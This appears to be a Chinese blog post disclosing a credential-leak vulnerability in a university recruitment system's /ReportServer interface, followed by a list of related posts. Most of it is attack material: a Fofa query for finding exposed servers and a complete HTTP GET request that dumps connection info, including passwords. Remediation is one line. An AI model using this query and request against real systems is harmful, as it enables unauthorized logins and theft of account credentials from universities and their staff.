易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
Dovir多多1 小时前
Python数据处理——re库与pydantic的使用总结与实战,处理采集到的思科ASA防火墙设备信息
网络·python·计算机网络·安全·网络安全·数据分析
Clockwiseee2 小时前
RCE常见姿势
安全·web安全·网络安全
denglei.3 小时前
在Nginx部署Web应用,如何保障后端API的安全
nginx·安全
Smile灬凉城6664 小时前
robots协议
安全·php·robots
云卓SKYDROID5 小时前
无人机察打一体系统设计优缺点!
科技·无人机·科普·云卓科技·察打一体飞机
TIKOOL太酷全双工内通6 小时前
什么是公网对讲机?公网对讲机有哪些好的品牌
科技·信息与通信·公网全双工通话
Hacker_Nightrain6 小时前
网络安全与加密
安全·web安全
网安-轩逸8 小时前
汽车网络安全渗透测试
安全·web安全·汽车
深圳市青牛科技实业有限公司 小芋圆8 小时前
开关电源特点、分类、工作方式
前端·科技·单片机·物联网·分类·数据挖掘·新能源
几维安全9 小时前
如何通过运行时威胁洞察提升反欺诈策略
运维·网络·安全